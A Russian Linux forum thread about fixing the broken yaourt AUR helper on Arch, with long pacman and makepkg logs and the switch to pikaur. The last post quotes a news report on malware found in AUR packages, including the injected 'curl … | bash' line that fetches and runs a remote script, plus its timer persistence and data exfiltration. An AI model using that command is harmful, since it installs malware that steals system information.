Zenway

Linux - это интересно!

Вы не вошли.

#1 29-05-2018 07:21:31

BigOrange
Модератор
Откуда: Саратов
Здесь с 20-11-2010
Сообщений: 1,459
LinuxUnknown

Arch перестал работать yaourt

хотел обновить пакеты из АУР, а тут вот:

~$ yaourt -Suy --aur
package-query: error while loading shared libraries: libalpm.so.10: cannot open shared object file: No such file or directory
:: Обновление баз данных пакетов...
 core не устарел
 extra не устарел
 community не устарел
 multilib не устарел
 archlinuxfr не устарел
 cincv не устарел
package-query: error while loading shared libraries: libalpm.so.10: cannot open shared object file: No such file or directory

package-query: error while loading shared libraries: libalpm.so.10: cannot open shared object file: No such file or directory
No database errors have been found!
~$

при этом пакман работает нормлаьно


Долой DE! Даёшь WM!

Вне форума

#2 29-05-2018 08:47:25

redix
Участник
Здесь с 14-02-2013
Сообщений: 1,567
LinuxChrome 66.0

Re: Arch перестал работать yaourt

А ты комменты в АУР читал? https://aur.archlinux.org/packages/yaourt/

И на форуме:

После сегодняшней обновы

yaourt -Syua
package-query: error while loading shared libraries: libalpm.so.10: cannot open shared object file: No such file or directory
upd: рецепт - скачать и пересобрать package-query

https://archlinux.org.ru/forum/post/205043/

Отредактировано redix (29-05-2018 08:50:15)


In Tux We Trust

Вне форума

#3 29-05-2018 18:47:58

BigOrange
Модератор
Откуда: Саратов
Здесь с 20-11-2010
Сообщений: 1,459
LinuxUnknown

Re: Arch перестал работать yaourt

@redix, читал, но проблема нигде не решена ((
мало того пакман теперь кочевряжится, но с эти проще:

~$ sudo pacman -Suy
:: Обновление баз данных пакетов...
 core не устарел
 extra не устарел
 community не устарел
 multilib не устарел
 archlinuxfr не устарел
 cincv не устарел
:: Запускается полное обновление системы...
разрешение зависимостей...
проверка конфликтов...
ошибка: не удалось подготовить транзакцию (не удалось удовлетворить зависимости)
:: installing x265 (2.8-1) breaks dependency 'libx265.so=151-64' required by ffmpeg2.8

Добавлено спустя 24 мин 34 с:
воспользовался вот этим:

https://github.com/actionless/pikaur

Installation
sudo pacman -S --needed base-devel git
git clone https://aur.archlinux.org/pikaur.git
cd pikaur
makepkg -fsri

Run without installation
git clone https://github.com/actionless/pikaur.git
cd pikaur
python3 ./pikaur.py -Ss AUR_PACKAGE_NAME
python3 ./pikaur.py -S AUR_PACKAGE_NAME
python3 ./pikaur.py -Syu

Configuration
~/.config/pikaur.conf

и оно работает!

Добавлено спустя 29 мин 07 с:

Скрытый текст
~/programs/sys/pikaur$ sudo pacman -S --needed base-devel git
[sudo] пароль для sveta: 
:: There are 26 members in group base-devel:
:: Repository core
   1) autoconf  2) automake  3) binutils  4) bison  5) fakeroot  6) file
   7) findutils  8) flex  9) gawk  10) gcc  11) gettext  12) grep  13) groff
   14) gzip  15) libtool  16) m4  17) make  18) pacman  19) patch
   20) pkg-config  21) sed  22) sudo  23) systemd  24) texinfo  25) util-linux
   26) which

Выберите вариант (по-умолчанию=все): 
предупреждение: autoconf-2.69-4 не устарел -- пропускается
предупреждение: automake-1.15.1-1 не устарел -- пропускается
предупреждение: binutils-2.30-4 не устарел -- пропускается
предупреждение: bison-3.0.4-3 не устарел -- пропускается
предупреждение: fakeroot-1.22-1 не устарел -- пропускается
предупреждение: file-5.33-3 не устарел -- пропускается
предупреждение: findutils-4.6.0-2 не устарел -- пропускается
предупреждение: flex-2.6.4-1 не устарел -- пропускается
предупреждение: gawk-4.2.1-1 не устарел -- пропускается
предупреждение: gcc-8.1.0-1 не устарел -- пропускается
предупреждение: gettext-0.19.8.1-2 не устарел -- пропускается
предупреждение: grep-3.1-1 не устарел -- пропускается
предупреждение: groff-1.22.3-7 не устарел -- пропускается
предупреждение: gzip-1.9-1 не устарел -- пропускается
предупреждение: libtool-2.4.6+40+g6ca5e224-6 не устарел -- пропускается
предупреждение: m4-1.4.18-1 не устарел -- пропускается
предупреждение: make-4.2.1-2 не устарел -- пропускается
предупреждение: pacman-5.1.0-1 не устарел -- пропускается
предупреждение: patch-2.7.6-1 не устарел -- пропускается
предупреждение: pkg-config-0.29.2-1 не устарел -- пропускается
предупреждение: sed-4.5-1 не устарел -- пропускается
предупреждение: sudo-1.8.23-2 не устарел -- пропускается
предупреждение: systemd-238.76-1 не устарел -- пропускается
предупреждение: texinfo-6.5-1 не устарел -- пропускается
предупреждение: util-linux-2.32-3 не устарел -- пропускается
предупреждение: which-2.21-2 не устарел -- пропускается
предупреждение: git-2.17.0-1 не устарел -- пропускается
 делать больше нечего
~/programs/sys/pikaur$ git clone https://aur.archlinux.org/pikaur.git
fatal: целевой путь «pikaur» уже существует и не является пустым каталогом.
~/programs/sys/pikaur$ makepkg -fsri
==> Сборка пакета pikaur-git 0.11.4-1 (Вт 29 мая 2018 19:07:34)
==> Проверка зависимостей для запуска...
==> Установка недостающих зависимостей...
разрешение зависимостей...
проверка конфликтов...

Пакеты (1) pyalpm-0.8.3-1

Будет загружено:  0,04 MiB
Будет установлено:  0,20 MiB

:: Приступить к установке? [Y/n] 
:: Получение пакетов...
 pyalpm-0.8.3-1-x86_64     42,1 KiB   601K/s 00:00 [----------------------] 100%
(1/1) проверка ключей                              [----------------------] 100%
(1/1) проверка целостности пакета                  [----------------------] 100%
(1/1) загрузка файлов пакетов                      [----------------------] 100%
(1/1) проверка конфликтов файлов                   [----------------------] 100%
(1/1) проверка доступного места                    [----------------------] 100%
:: Обработка изменений пакета...
(1/1) установка pyalpm                             [----------------------] 100%
:: Запуск post-transaction hooks...
(1/1) Arming ConditionNeedsUpdate...
==> Проверка зависимостей для сборки...
==> Получение исходных файлов...
  -> Клонирование репозитория 'pikaur-git' (git)...
Клонирование в голый репозиторий «/home/sveta/programs/sys/pikaur/pikaur-git»…
remote: Counting objects: 3879, done.
remote: Compressing objects: 100% (74/74), done.
remote: Total 3879 (delta 90), reused 125 (delta 72), pack-reused 3733
Получение объектов: 100% (3879/3879), 2.94 MiB | 1.41 MiB/s, готово.
Определение изменений: 100% (2744/2744), готово.
==> Проверка файлов source с использованием md5sums...
    pikaur-git ... Пропущено
==> Распаковка исходных файлов...
  -> Создание рабочей копии репозитория 'pikaur-git' (git)...
Клонирование в «pikaur-git»…
готово.
Переключено на новую ветку «makepkg»
==> Запускается pkgver()...
==> Обновлённая версия: 'pikaur-git 0.11.4.r1.g8e796e1-1'
==> Запускается build()...
find pikaur -type f -name '*.py' -not -name 'argparse.py' \
	| xargs xgettext --language=python --add-comments --sort-output \
		--default-domain=pikaur --from-code=UTF-8 --keyword='_n:1,2' --output=locale/pikaur.pot
test -f locale/fr.po || msginit --locale=fr --no-translator --input=locale/pikaur.pot --output=locale/fr.po
test -f locale/ru.po || msginit --locale=ru --no-translator --input=locale/pikaur.pot --output=locale/ru.po
test -f locale/pt.po || msginit --locale=pt --no-translator --input=locale/pikaur.pot --output=locale/pt.po
msgmerge --update locale/fr.po locale/pikaur.pot
msgmerge --update locale/ru.po locale/pikaur.pot
msgmerge --update locale/pt.po locale/pikaur.pot
............ завершено.
............. завершено.
.........test -f locale/de.po || msginit --locale=de --no-translator --input=locale/pikaur.pot --output=locale/de.po
..... завершено.
msgmerge --update locale/de.po locale/pikaur.pot
............... завершено.
test -f locale/is.po || msginit --locale=is --no-translator --input=locale/pikaur.pot --output=locale/is.po
test -f locale/tr.po || msginit --locale=tr --no-translator --input=locale/pikaur.pot --output=locale/tr.po
test -f locale/da.po || msginit --locale=da --no-translator --input=locale/pikaur.pot --output=locale/da.po
msgmerge --update locale/is.po locale/pikaur.pot
msgmerge --update locale/tr.po locale/pikaur.pot
msgmerge --update locale/da.po locale/pikaur.pot
.............. завершено.
.test -f locale/nl.po || msginit --locale=nl --no-translator --input=locale/pikaur.pot --output=locale/nl.po
.............. завершено.
.msgfmt -o locale/fr.mo locale/fr.po
............. завершено.
msgmerge --update locale/nl.po locale/pikaur.pot
msgfmt -o locale/ru.mo locale/ru.po
msgfmt -o locale/pt.mo locale/pt.po
.........msgfmt -o locale/de.mo locale/de.po
 завершено.
msgfmt -o locale/is.mo locale/is.po
msgfmt -o locale/tr.mo locale/tr.po
msgfmt -o locale/da.mo locale/da.po
msgfmt -o locale/nl.mo locale/nl.po
==> Вход в окружение fakeroot...
==> Запускается package()...
running install
running build
running build_py
creating build
creating build/lib
creating build/lib/pikaur
copying pikaur/aur_deps.py -> build/lib/pikaur
copying pikaur/search_cli.py -> build/lib/pikaur
copying pikaur/pacman.py -> build/lib/pikaur
copying pikaur/install_cli.py -> build/lib/pikaur
copying pikaur/core.py -> build/lib/pikaur
copying pikaur/threading.py -> build/lib/pikaur
copying pikaur/aur.py -> build/lib/pikaur
copying pikaur/package_update.py -> build/lib/pikaur
copying pikaur/progressbar.py -> build/lib/pikaur
copying pikaur/argparse.py -> build/lib/pikaur
copying pikaur/srcinfo.py -> build/lib/pikaur
copying pikaur/pikspect.py -> build/lib/pikaur
copying pikaur/args.py -> build/lib/pikaur
copying pikaur/build.py -> build/lib/pikaur
copying pikaur/replacements.py -> build/lib/pikaur
copying pikaur/makepkg_config.py -> build/lib/pikaur
copying pikaur/config.py -> build/lib/pikaur
copying pikaur/conflicts.py -> build/lib/pikaur
copying pikaur/main.py -> build/lib/pikaur
copying pikaur/__init__.py -> build/lib/pikaur
copying pikaur/prompt.py -> build/lib/pikaur
copying pikaur/exceptions.py -> build/lib/pikaur
copying pikaur/i18n.py -> build/lib/pikaur
copying pikaur/version.py -> build/lib/pikaur
copying pikaur/pprint.py -> build/lib/pikaur
running install_lib
creating /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr
creating /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib
creating /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6
creating /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages
creating /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur
copying build/lib/pikaur/aur_deps.py -> /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur
copying build/lib/pikaur/search_cli.py -> /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur
copying build/lib/pikaur/pacman.py -> /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur
copying build/lib/pikaur/install_cli.py -> /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur
copying build/lib/pikaur/core.py -> /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur
copying build/lib/pikaur/threading.py -> /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur
copying build/lib/pikaur/aur.py -> /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur
copying build/lib/pikaur/package_update.py -> /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur
copying build/lib/pikaur/progressbar.py -> /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur
copying build/lib/pikaur/argparse.py -> /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur
copying build/lib/pikaur/srcinfo.py -> /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur
copying build/lib/pikaur/pikspect.py -> /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur
copying build/lib/pikaur/args.py -> /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur
copying build/lib/pikaur/build.py -> /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur
copying build/lib/pikaur/replacements.py -> /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur
copying build/lib/pikaur/makepkg_config.py -> /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur
copying build/lib/pikaur/config.py -> /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur
copying build/lib/pikaur/conflicts.py -> /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur
copying build/lib/pikaur/main.py -> /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur
copying build/lib/pikaur/__init__.py -> /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur
copying build/lib/pikaur/prompt.py -> /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur
copying build/lib/pikaur/exceptions.py -> /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur
copying build/lib/pikaur/i18n.py -> /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur
copying build/lib/pikaur/version.py -> /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur
copying build/lib/pikaur/pprint.py -> /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur
byte-compiling /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur/aur_deps.py to aur_deps.cpython-36.pyc
byte-compiling /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur/search_cli.py to search_cli.cpython-36.pyc
byte-compiling /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur/pacman.py to pacman.cpython-36.pyc
byte-compiling /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur/install_cli.py to install_cli.cpython-36.pyc
byte-compiling /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur/core.py to core.cpython-36.pyc
byte-compiling /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur/threading.py to threading.cpython-36.pyc
byte-compiling /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur/aur.py to aur.cpython-36.pyc
byte-compiling /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur/package_update.py to package_update.cpython-36.pyc
byte-compiling /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur/progressbar.py to progressbar.cpython-36.pyc
byte-compiling /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur/argparse.py to argparse.cpython-36.pyc
byte-compiling /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur/srcinfo.py to srcinfo.cpython-36.pyc
byte-compiling /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur/pikspect.py to pikspect.cpython-36.pyc
byte-compiling /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur/args.py to args.cpython-36.pyc
byte-compiling /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur/build.py to build.cpython-36.pyc
byte-compiling /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur/replacements.py to replacements.cpython-36.pyc
byte-compiling /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur/makepkg_config.py to makepkg_config.cpython-36.pyc
byte-compiling /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur/config.py to config.cpython-36.pyc
byte-compiling /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur/conflicts.py to conflicts.cpython-36.pyc
byte-compiling /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur/main.py to main.cpython-36.pyc
byte-compiling /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur/__init__.py to __init__.cpython-36.pyc
byte-compiling /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur/prompt.py to prompt.cpython-36.pyc
byte-compiling /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur/exceptions.py to exceptions.cpython-36.pyc
byte-compiling /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur/i18n.py to i18n.cpython-36.pyc
byte-compiling /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur/version.py to version.cpython-36.pyc
byte-compiling /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur/pprint.py to pprint.cpython-36.pyc
writing byte-compilation script '/tmp/tmphqbo6x1o.py'
/usr/bin/python /tmp/tmphqbo6x1o.py
removing /tmp/tmphqbo6x1o.py
running install_egg_info
Writing /home/sveta/programs/sys/pikaur/pkg/pikaur-git/usr/lib/python3.6/site-packages/pikaur-0.11.4-py3.6.egg-info
==> Очистка...
  -> Удаление файлов libtool...
  -> Удаление ненужных файлов...
  -> Удаление статических библиотек...
  -> Удаление отладочной информации из бинарников и библиотек...
  -> Сжатие документации (man и info)...
==> Checking for packaging issues...
==> Создание пакета "pikaur-git"...
  -> Создание файла '.PKGINFO'...
  -> Создание файла '.BUILDINFO'...
  -> Создание файла '.MTREE'...
  -> Сжатие пакета...
==> Выход из окружения fakeroot.
==> Завершена сборка пакета pikaur-git 0.11.4.r1.g8e796e1-1 (Вт 29 мая 2018 19:07:46)
==> Установка пакета 'pikaur-git' с помощью 'pacman -U'...
загрузка пакетов...
разрешение зависимостей...
проверка конфликтов...

Пакеты (1) pikaur-git-0.11.4.r1.g8e796e1-1

Будет установлено:  0,88 MiB

:: Приступить к установке? [Y/n] 
(1/1) проверка ключей                              [----------------------] 100%
(1/1) проверка целостности пакета                  [----------------------] 100%
(1/1) загрузка файлов пакетов                      [----------------------] 100%
(1/1) проверка конфликтов файлов                   [----------------------] 100%
(1/1) проверка доступного места                    [----------------------] 100%
:: Обработка изменений пакета...
(1/1) установка pikaur-git                         [----------------------] 100%
:: Запуск post-transaction hooks...
(1/1) Arming ConditionNeedsUpdate...
~/programs/sys/pikaur$ python3 ./pikaur.py -Syu
:: Обновление баз данных пакетов...
 core не устарел
 extra не устарел
 community не устарел
 multilib не устарел
 archlinuxfr не устарел
 cincv не устарел
:: Запуск полного обновления пакетов из AUR...
Чтение локальной базы данных пакетов...
Чтение баз данных пакетов из репозиториев...
Чтение информации о пакетах из AUR...
:: внимание: Данные пакеты не могут быть найдены в AUR:
    dexed-vst-git    
    gegl02    
    js    
    js17    
    lib32-js17    
    lib32-json-c    
    lib32-libtxc_dxtn    
    libcloudproviders    
    libcuefile    
    libgtksourceviewmm2    
    libqzeitgeist    
    libtracker-sparql    
    libtxc_dxtn    
    pinot    
    pkgbrowser-qt4    
    python2-enum    
    python2-jsonrpclib    
    rsvg2-sharp    
    skypeforlinux-bin    
    vte    
    xorg-server-utils    
Resolving AUR dependencies...

:: Будут установлены пакеты из AUR:
 dpf-plugins-git                  r85.6454c59-1  -> r86.0c433e4-1
 guitar-pro                       11686-3        -> 11686-5
 shotcut                          18.03-1        -> 18.05.08-1
 bitwig-studio                    2.3.2-1        -> 2.3.4-1
 eq10q                            2.2-1          -> 2.2-2
 imagewriter                      1.10.1420800585.134a9b3-8 -> 1.10.1432200249.1d253d9-1
 inxi                             3.0.07-1       -> 3.0.09-1
 gcc5                             5.5.0-1        -> 5.5.0-2
 grub-customizer                  5.0.6-7        -> 5.0.6-8

:: Proceed with installation? [Y/n] 
:: [v] просмотреть описания пакетов   [m] вручную выбрать пакеты
>> m


(leafpad:11579): Gtk-WARNING **: 19:09:14.136: Загружаемый модуль тем не найден в module_path: «adwaita»,

(leafpad:11579): Gtk-WARNING **: 19:09:14.136: Загружаемый модуль тем не найден в module_path: «adwaita»,
Чтение информации о пакетах из AUR...
:: внимание: Данные пакеты не могут быть найдены в AUR:
    dexed-vst-git    
    gegl02    
    js    
    js17    
    lib32-js17    
    lib32-json-c    
    lib32-libtxc_dxtn    
    libcloudproviders    
    libcuefile    
    libgtksourceviewmm2    
    libqzeitgeist    
    libtracker-sparql    
    libtxc_dxtn    
    pinot    
    pkgbrowser-qt4    
    python2-enum    
    python2-jsonrpclib    
    rsvg2-sharp    
    skypeforlinux-bin    
    vte    
    xorg-server-utils    
:: Пакет bitwig-studio (2.3.2-1 => 2.3.4-1) был проигнорирован
:: Пакет dpf-plugins-git (r85.6454c59-1 => r86.0c433e4-1) был проигнорирован
:: Пакет eq10q (2.2-1 => 2.2-2) был проигнорирован
:: Пакет gcc5 (5.5.0-1 => 5.5.0-2) был проигнорирован
:: Пакет grub-customizer (5.0.6-7 => 5.0.6-8) был проигнорирован
:: Пакет guitar-pro (11686-3 => 11686-5) был проигнорирован
:: Пакет imagewriter (1.10.1420800585.134a9b3-8 => 1.10.1432200249.1d253d9-1) был проигнорирован
:: Пакет shotcut (18.03-1 => 18.05.08-1) был проигнорирован
Resolving AUR dependencies...

:: Будет установлен пакет из AUR:
 inxi                                  3.0.07-1            -> 3.0.09-1

:: Proceed with installation? [Y/n] 
:: [v] просмотреть описания пакетов   [m] вручную выбрать пакеты
>> 
поиск конфликтующих пакетов...
Хотите ли вы отредактировать PKGBUILD из пакета inxi? [Y/n] n
:: Запускается полное обновление системы...
 делать больше нечего
Чтение локальной базы данных пакетов...

==> Сборка пакета inxi 3.0.09-1 (Вт 29 мая 2018 19:10:01)
==> Проверка зависимостей для запуска...
==> Проверка зависимостей для сборки...
==> Получение исходных файлов...
  -> Загрузка inxi-3.0.09.tar.gz...
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   119    0   119    0     0    154      0 --:--:-- --:--:-- --:--:--   154
100  231k  100  231k    0     0  97896      0  0:00:02  0:00:02 --:--:--  347k
==> Проверка файлов source с использованием sha256sums...
    inxi-3.0.09.tar.gz ... Готово
==> Распаковка исходных файлов...
  -> Распаковка 'inxi-3.0.09.tar.gz' с помощью bsdtar
==> Вход в окружение fakeroot...
==> Запускается package()...
==> Очистка...
  -> Удаление файлов libtool...
  -> Удаление ненужных файлов...
  -> Удаление статических библиотек...
  -> Удаление отладочной информации из бинарников и библиотек...
  -> Сжатие документации (man и info)...
==> Checking for packaging issues...
==> Создание пакета "inxi"...
  -> Создание файла '.PKGINFO'...
  -> Создание файла '.BUILDINFO'...
  -> Создание файла '.MTREE'...
  -> Сжатие пакета...
==> Выход из окружения fakeroot.
==> Завершена сборка пакета inxi 3.0.09-1 (Вт 29 мая 2018 19:10:06)

загрузка пакетов...
разрешение зависимостей...
проверка конфликтов...

Пакеты (1) inxi-3.0.09-1

Будет установлено:  0,55 MiB
Изменение размера:  0,04 MiB

:: Приступить к установке? [Y/n] 

(1/1) проверка ключей                                        [---------------------------------] 100%
(1/1) проверка целостности пакета                            [---------------------------------] 100%
(1/1) загрузка файлов пакетов                                [---------------------------------] 100%
(1/1) проверка конфликтов файлов                             [---------------------------------] 100%
(1/1) проверка доступного места                              [---------------------------------] 100%
:: Обработка изменений пакета...
(1/1) обновление inxi                                        [---------------------------------] 100%
:: Запуск post-transaction hooks...
(1/1) Arming ConditionNeedsUpdate...
~/programs/sys/pikaur$ 

Добавлено спустя 45 мин 18 с:
добавил китайскую репу в /etc/pacman.conf

[archlinuxcn]
Server = https://cdn.repo.archlinuxcn.org/$arch

установил оттуда package-query-1.9-3
йогурт заработал
проблема решена


Долой DE! Даёшь WM!

Вне форума

#4 29-05-2018 19:37:09

redix
Участник
Здесь с 14-02-2013
Сообщений: 1,567
LinuxChrome 66.0

Re: Arch перестал работать yaourt

Взял бы да установил argon, он не использует йогурт, есть простецкий гуй с тремя настройками, можно удалять\устанавливать, обновляться и есть встроенный уведомлятор.

ЗЫ. Что то я читаю последние топики на арчефоруме, и многие из них мне не нравятся, подожду чудок с установкой, а то я пару дней назад поставил арч с крысой, все встало вроде как положено, а при логине через lightdm крешатся иксы. Оказалось что есть такой баг, в общем посижу пока на центоси, не рассыплюсь. )

Отредактировано redix (29-05-2018 19:41:52)


In Tux We Trust

Вне форума

#5 29-05-2018 20:21:28

BigOrange
Модератор
Откуда: Саратов
Здесь с 20-11-2010
Сообщений: 1,459
LinuxUnknown

Re: Arch перестал работать yaourt

@redix, попробуй slim + openbox  с крысиными плюшками
всё равно у тебя баги
argon неее там что-то наркоманское в зависимостях
не нравится он мне


Долой DE! Даёшь WM!

Вне форума

#6 02-07-2018 22:29:56

redix
Участник
Здесь с 14-02-2013
Сообщений: 1,567
LinuxChrome 67.0

Re: Arch перестал работать yaourt

Пока на йогурте останусь, собирал вот так:

sudo pacman -S --needed base-devel git wget yajl

cd /tmp

git clone https://aur.archlinux.org/package-query.git

cd package-query/

makepkg -si && cd /tmp/

git clone https://aur.archlinux.org/yaourt.git

cd yaourt/ && makepkg -si

Советуют picaur, говорят что такой же самый, но я подожду немного, йогурт то работает, пока по крайней мере.


In Tux We Trust

Вне форума

#7 02-07-2018 23:55:23

BigOrange
Модератор
Откуда: Саратов
Здесь с 20-11-2010
Сообщений: 1,459
LinuxUnknown

Re: Arch перестал работать yaourt

@redix, pikaur наверное, я тоже такую ошибку делал по началу)
да чёт арчик "посыпался"
до этого 4 года стабильности, и вот началось, то одно, то другое...


Долой DE! Даёшь WM!

Вне форума

#8 03-07-2018 02:37:03

redix
Участник
Здесь с 14-02-2013
Сообщений: 1,567
LinuxChrome 67.0

Re: Arch перестал работать yaourt

BigOrange пишет:

pikaur наверное

Ага, в текст закрались очипятки. )))

BigOrange пишет:

да чёт арчик "посыпался"

Да вроде в порядке все на новой установке, Захардкодил трей сегодня:

Yy8ui3T.png

Почти разобрался со шрифтами, не Рио-де-Жанейро конечно, но убрал мыло, и палки стали одинаковой ширины, не хватает четкости, имхо конечно.

jppe4Cf.png

Но не без боков конечно, позавчера было лень в своем архиве рыться, решил по бырику нагуглить как установить кодеки и еще там кой чего, нашел скрипт на гитхабе, и запустил не читая, эта гадина переписала makepkg.conf, pacman.conf, подключила тестинг и влепила штук тридцать пакетов оттуда. Так что переставляться придется по любасу.


In Tux We Trust

Вне форума

#9 03-07-2018 09:13:09

BigOrange
Модератор
Откуда: Саратов
Здесь с 20-11-2010
Сообщений: 1,459
LinuxUnknown

Re: Arch перестал работать yaourt

@redix, да ладно, сразу переустанавливать
тестинг закрой, оно само пройдёт)))
а насчёт кодеков не помню, чтобы я так заморачивался, они же как зависимости обычно ставятся


Долой DE! Даёшь WM!

Вне форума

#10 03-07-2018 09:35:10

redix
Участник
Здесь с 14-02-2013
Сообщений: 1,567
LinuxChrome 67.0

Re: Arch перестал работать yaourt

Поставил радиотрей, включил smooth jazz, и он мне вывалил воооот такенное сообщение про gst-plugins, вот и решил влепить все оптом.

BigOrange пишет:

да ладно, сразу переустанавливать
тестинг закрой, оно само пройдёт)))

Да закомментил сразу же, как увидел, даже откатил с пяток пакетов, потом обломился. А так, это же экспериментальная установка на винте, потом буду ставить на ssd, где он и был раньше.

Добавлено спустя 3 ч 02 мин 04 с:
Если интересно, то вот так я сглаживаю шрифты в Арче: https://pastebin.com/AaBXT8mi


In Tux We Trust

Вне форума

#11 08-07-2018 22:15:37

BigOrange
Модератор
Откуда: Саратов
Здесь с 20-11-2010
Сообщений: 1,459
LinuxUnknown

Re: Arch перестал работать yaourt

кстати, за pikaur косячок есть
думал им обойдусь, он же без установки может работать
но не тут то-было
установил пакет, зависимости к нему
отработал, как бэ
но пакман мне пишет потом, типа: действие выполняется, изивините, больше одного за раз не могу


Долой DE! Даёшь WM!

Вне форума

#12 08-07-2018 22:34:30

redix
Участник
Здесь с 14-02-2013
Сообщений: 1,567
LinuxChrome 67.0

Re: Arch перестал работать yaourt

Не, пока йогурт работает лично я ничего менять не буду. Как говорил мой бывший шеф по СТО - Лучшее враг хорошего. И мне не нравится хипстерский софт, да еще в таком количестве и с таблицами впридачу.


In Tux We Trust

Вне форума

#13 11-07-2018 20:09:46

posixru
Модератор
Откуда: СССР
Здесь с 21-10-2010
Сообщений: 1,413
Сайт
LinuxSeaMonkey 2.49

Re: Arch перестал работать yaourt

Не знаю как кто, а я этого давно ждал:

В AUR-репозитории Arch Linux найдено вредоносное ПО

опеннетка пишет:

В AUR-репозитории Arch Linux, в котором размещаются не входящие в дистрибутив пакеты от сторонних разработчиков, найдены три пакета, содержащие вредоносные вставки. Проблема выявлена в пакетах acroread 9.5.5-8 (Adobe PDF Reader), balz 1.20-3 (утилита для сжатия файлов) и minergate 8.1-2 (GUI для майнинга криптовалют). В данные пакеты был добавлен код для загрузки и запуска скрипта с внешнего сервера, активируемый во время установки пакетов.

Скрытый текст

7 июля в пакеты были внесены изменения, в результате которых в файл PKGBUILD был добавлен код "curl -s https://ptpb.pw/~x|bash -&" вызываемый в секции установки пакета. Указанный скрипт выполнял загрузку другого скрипта "https://ptpb.pw/~u", устанавливал его как /usr/lib/xeactor/u.sh и активировал через периодический вызов по таймеру (создавался файл /usr/lib/systemd/system/xeactor.timer). В скрипте u.sh присутствовал код для отправки сведений о системе и установленных пакетах через сервис pastebin.com, а также для создания файла compromised.txt в домашних директориях всех пользователей.

